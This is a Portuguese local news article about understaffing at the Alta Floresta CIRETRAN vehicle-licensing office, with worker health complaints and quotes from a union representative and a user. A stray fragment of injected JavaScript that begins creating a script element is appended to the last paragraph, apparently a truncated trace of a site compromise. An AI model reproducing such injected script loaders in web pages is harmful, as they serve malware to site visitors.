Capa / Cidades / 20ª CIRETRAN de AF causa transtornos a população por falta de funcionários

20ª CIRETRAN de AF causa transtornos a população por falta de funcionários

Sem TítuloRenan Nery

A 20ª CIRETRAN de Alta Floresta atende mais cinco municípios: Carlinda, Paranaíta, Apiácas, Nova Monte Verde e Nova Bandeirantes. O que provoca uma sobrecarga de trabalho para os oito servidores lotados na agência. O número de funcionário é insuficiente ao necessário para que possa ofertar um serviço de qualidade.
O vistoriador e representante regional do Sindicato dos Servidores do Detran (Sinetran MT), Carlos Reinke, disse que a 20ª Ciretran precisaria de pelo menos mais cinco funcionários para que possa oferecer a população um serviços de melhor qualidade e com isso diminuir o tempo de espera para atendimento.
“A nossa reivindicação falando em relação a Alta Floresta, hoje a gente precisaria além da melhoria na estrutura física, a questão de saúde a insalubridade no local de trabalho, melhor estrutura, condições de trabalho, a gente precisaria de pelo menos mais cinco servidores pro atendimento, para gente poder prestar um atendimento melhor para população da região”, disse Carlos Reinke.
No entanto a 20ª Ciretran de Alta Floresta, se encontra atualmente com 2 funcionários disponíveis para atendimento ao público, causando transtorno para os usuários que perdem cerca de 2 horas do seu horário de trabalho, para aguardar o atendimento que dura cerca de 2 minutos.
“Já fazem 2 dias que estou buscando atendimento. Porem eu vejo isso como a falta de vontade do governo, e não dos funcionários, depois de aguardar na fila somos bem atendido”, disse Everaldo Francisco em uma entrevista para a equipe do Jornal O Diário.
Se para o usuário é um transtorno para os funcionários a questão recai sobre a saúde. Os atendentes do Detran ficam durante muito tempo sentados diante da tela do computador o que pode causar problemas oculares, além de que ficar muito tempo sentado faz mal à saúde e aumenta o risco de doenças cardiovasculares.
Ficar muito tempo frente ao computador a pessoa pode desenvolver a a Síndrome da Visão de Computador que é semelhante a qualquer outra lesão por estresse repetitivo.
Sintomas
Os sintomas são: Visão embaçada, contrações involuntárias do músculo ocular, dor nos olhos, dor de cabeça constante, dor nos ombros e no pulso são sintomas que traduzem a presença da síndrome.
O ideal é que o funcionário tivesse um tempo para descansar a visão e andar um pouco para melhorar a circulação. Mas o horário que eles tem é somente de 1 hora para o almoço.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top